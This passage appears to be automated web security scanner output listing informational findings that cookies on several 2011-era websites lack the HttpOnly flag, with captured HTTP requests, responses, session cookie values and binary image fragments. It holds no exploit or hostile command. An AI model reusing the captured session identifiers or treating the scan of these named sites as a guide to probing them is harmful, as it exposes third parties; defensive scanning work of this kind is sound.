Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=iiFz5fMs2QShjkhZT8LeYctQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQKFq4fisNXg8aj5XcunNcMDa7Re6IGD4lNgBKuNuTpUhAd6xyMUDLG5lQJdhrgBMSAvGD45Q9a4FEBqbD2j4hAiiCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvzv7isqEZGsyCMaXAZCYEXjdJRFsRyXovJP46iixMTIzLpWr1XIQIIGVTD2hEugu6d5BiitkUr3XlA8XK8qisqrmVaGZFS5a7fwuH7sQ46xipWO7p50vbcvMQEdM8EL3R4f4J5Ufxc35xQDd3qfFvtjSMcZon9yt55w3TOIwQ0TyFv2zEoDD2QOGIoPgD4Dq0eDBT5IhXJA5LH3s1gXpy8bjFCh02EPiiJWd8pSf2DhmMwRPaHcohp8zdUc1WUMZoWWHG9a09m7kipeK2wjn3eQsLh6cdwnjLty94KHGS82BSc6FNV4ie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 07 May 2011 01:50:38 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Sat, 05-Nov-2011 13:50:38 GMT; Path=/
Set-Cookie: BizoData=LD8Lqa0kruispSaV6t7UwYtQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGJ94jaV36dZRvdH39nGZ6tNcii8xtm6s0HisR0f148m02M66BUXiip7ft9cii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL1VlnkdUIIh0FExkNK7HUtFQY8D8EoTSfZVlnkdUIIh0AYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYss3U7rEuRSisSXisM3wdRWhA3dsnRGwuisv9sgNCHPPoPZ5qdIs74mBmkdyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFahipEZiiUfSg1G9jy3KswFnWMODCrIgmWLLCZMvip3ebNkazzC5XAau0nMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMN4isdjziiaqnDJGFm85Jnii6bdsnRGwuisv9t6LhwMcOtHAUjz4EQIlrt9cii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipVtMipadorvipIWA5B16a2n9ccq0ipUPxAAhwBFhw9bW02NQdnXDrRufkxSPPgRAiiWu31yLzG2bqzQfB1c7D7UHWcJ7wkafesisJezZzmURE5lZipFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTBCmcQve7W9mKliiSobRLLWb5OrVGMiprsJQvfINu2DxP8owJ5xoQhXZNp7hVJoVB1TGlJZ8zWJiiJArqYAAFGAQj0dI1pxbY6k4tmEPishbY3ELmLzCbjtVl37F6KeOOIHvpt; Domain=.bizographics.com; Expires=Sat, 05-Nov-2011 13:50:38 GMT; Path=/
Set-Cookie: BizoNetworkPartnerIndex=15; Domain=.bizographics.com; Expires=Wed, 01-Jun-2011 00:00:00 GMT; Path=/
Content-Length: 649
Connection: keep-alive

_bizo_set_session_cookie("_bizo_bzid","55f5fe79-12b4-4f78-9976-61924d438e85",1);_bizo_fire_rm("E6D","T8P","H3I","D8N","Q3K","C9Q");_bizo_set_session_cookie("_bizo_cksm","46E4889E3A878800",1);_bizo_fir
...[SNIP]...
18.157. http://www.dhmiservices.com/ClickContact/js.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ClickContact/js.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 623
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:39:55 GMT; path=/

function load565509113() {
var load = window.open('http://950b13d4-72fe-46ca-891d-8922b0525b3e.dhmiservices.com/ClickContact/popup.aspx?var1=950b13d4-7
...[SNIP]...
18.158. http://www.dhmiservices.com/ImageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ImageHandler.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ImageHandler.ashx?img_id=3824 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/png
Content-Length: 5783
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:12 GMT; path=/

.PNG
.
...IHDR...{...).......V.....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx..\y.\Ez.U..sv..9..o.YX..k..m.q.$..!..r.h.........H.lb...d...+...k.pK..5......3>......U...U...1....'..u.........G`.CP.hM
...[SNIP]...
18.159. http://www.dhmiservices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11246
Content-Type: image/x-icon
Last-Modified: Wed, 05 Dec 2007 16:04:38 GMT
Accept-Ranges: bytes
ETag: "06f49895837c81:45c2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 18:41:31 GMT
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:41:31 GMT; path=/

......00......h...6...00.............. ..........F#..(...0...`...............................H@..................XX......hh......hh......xx............................................................
...[SNIP]...
18.160. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /download/Intel_Expressway_Tokenization_Broker/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw HTTP/1.1
Host: www.dynamicperimeter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: pdpr=googletokenization; Expires=Sun, 08-May-2011 01:16:02 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 29614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta htt
...[SNIP]...
18.161. http://www.eneighborhoods.com/common/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /common/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/s_code.js HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 25641
Content-Type: application/x-javascript
Last-Modified: Wed, 07 May 2008 15:23:21 GMT
Accept-Ranges: bytes
ETag: "440a74856b0c81:660"
Date: Fri, 06 May 2011 18:40:25 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="deeneighborhoods"
var s=s_gi(s_account)
/**************
...[SNIP]...
18.162. http://www.eneighborhoods.com/css/basic.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /css/basic.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/basic.css HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1277
Content-Type: text/css
Last-Modified: Tue, 07 Sep 2010 19:48:48 GMT
Accept-Ranges: bytes
ETag: "4c143cb0c54ecb1:660"
Date: Fri, 06 May 2011 18:40:23 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

.header {font-family: Helvetica, Arial, Verdana, sans-serif; font-size: 20px; font-style: italic; font-weight: bold; color: #FFFFFF;}

.H1 {
   font-family: arial;
   font-size: 26px;
   color: #000000
...[SNIP]...
18.163. http://www.eneighborhoods.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 403 Forbidden
Content-Length: 210
Content-Type: text/html
Date: Fri, 06 May 2011 18:41:19 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<html><head><title>Error</title></head><body><head><title>Application Pool Access Denied</title></head>
<body><h1>The specified request cannot be executed from current Application Pool</h1></body></bo
...[SNIP]...
18.164. http://www.eneighborhoods.com/images/about_contact_us_menu_over.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/about_contact_us_menu_over.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/about_contact_us_menu_over.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 998
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:52:39 GMT
Accept-Ranges: bytes
ETag: "aabe3f8fcb27c91:660"
Date: Fri, 06 May 2011 18:40:34 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................P.................................
...[SNIP]...
18.165. http://www.eneighborhoods.com/images/about_contact_us_menu_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/about_contact_us_menu_up.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/about_contact_us_menu_up.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 948
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:52:30 GMT
Accept-Ranges: bytes
ETag: "7277f589cb27c91:660"
Date: Fri, 06 May 2011 18:40:34 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................P.................................
...[SNIP]...
18.166. http://www.eneighborhoods.com/images/agent_services_menu_over.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/agent_services_menu_over.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/agent_services_menu_over.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1327
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:36:56 GMT
Accept-Ranges: bytes
ETag: "9843a65dc927c91:660"
Date: Fri, 06 May 2011 18:40:31 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....H.H.....C....................................................................C.........................................................................x.................................
...[SNIP]...
18.167. http://www.eneighborhoods.com/images/agent_services_menu_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/agent_services_menu_up.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/agent_services_menu_up.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1254
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:33:52 GMT
Accept-Ranges: bytes
ETag: "faef81efc827c91:660"
Date: Fri, 06 May 2011 18:40:31 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C.........................................................................x.................................
...[SNIP]...
18.168. http://www.eneighborhoods.com/images/bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bullet.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 160
Content-Type: image/gif
Last-Modified: Mon, 06 Oct 2008 15:19:19 GMT
Accept-Ranges: bytes
ETag: "c17991e7c627c91:660"
Date: Fri, 06 May 2011 18:40:29 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89a........h.g.....$|.....o.D...............s.....j..w....................................................!.......,..............d1.$..@@....,.@4`(.I..C....;
18.169. http://www.eneighborhoods.com/images/cmls.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/cmls.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cmls.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1536
Content-Type: image/gif
Last-Modified: Fri, 22 Aug 2008 06:48:10 GMT
Accept-Ranges: bytes
ETag: "0b14da234c91:660"
Date: Fri, 06 May 2011 18:40:29 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89ao.......F}...u..8k.....V....Z............P.......(f....Dx.e..............!a..........S....M..|..n......../k..L........U..........@t.Q........a..H}.............j...W.........."b.......;t.2m....T
...[SNIP]...
18.170. http://www.eneighborhoods.com/images/dominion.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/dominion.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dominion.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 3181
Content-Type: image/gif
Last-Modified: Fri, 22 Aug 2008 06:48:11 GMT
Accept-Ranges: bytes
ETag: "8047e6a234c91:660"
Date: Fri, 06 May 2011 18:40:30 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89a.................    .]eg.H>4>?.............-'.........ywx.G<NWV.......*....    
.../-...........vp...OMP....]W............hmp......'%&...    ..b^_.ke.....    GCD.............x...kkk....91...../47..!....
...[SNIP]...
18.171. http://www.eneighborhoods.com/images/en_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/en_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/en_logo.gif HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 3151
Content-Type: image/gif
Last-Modified: Mon, 01 Dec 2008 18:32:54 GMT
Accept-Ranges: bytes
ETag: "a4a2bf39e353c91:660"
Date: Fri, 06 May 2011 18:40:30 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

GIF89a..!.............HID('"ied....'v.J....^.....0d.f........63/......XXSzyt.............N.................2....A@<......Gv.10,......qpk..}PPK...^_Y.I..A....,b.~........! !...;:8......))(......>o.....
...[SNIP]...
18.172. http://www.eneighborhoods.com/images/en_logo_white.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/en_logo_white.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/en_logo_white.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 30870
Content-Type: image/jpeg
Last-Modified: Mon, 01 Dec 2008 18:38:02 GMT
Accept-Ranges: bytes
ETag: "56421f1e353c91:660"
Date: Fri, 06 May 2011 18:40:26 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2008:12:01 13:37:59.........
...[SNIP]...
18.173. http://www.eneighborhoods.com/images/enterprise_solutions_menu_over.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /images/enterprise_solutions_menu_over.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/enterprise_solutions_menu_over.jpg HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Content-Length: 1590
Content-Type: image/jpeg
Last-Modified: Mon, 06 Oct 2008 15:50:59 GMT
Accept-Ranges: bytes
ETag: "a6e0b253cb27c91:660"
Date: Fri, 06 May 2011 18:40:31 GMT
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

......JFIF.....`.`.....C....................................................................C...........................................................................................................
...[SNIP]...
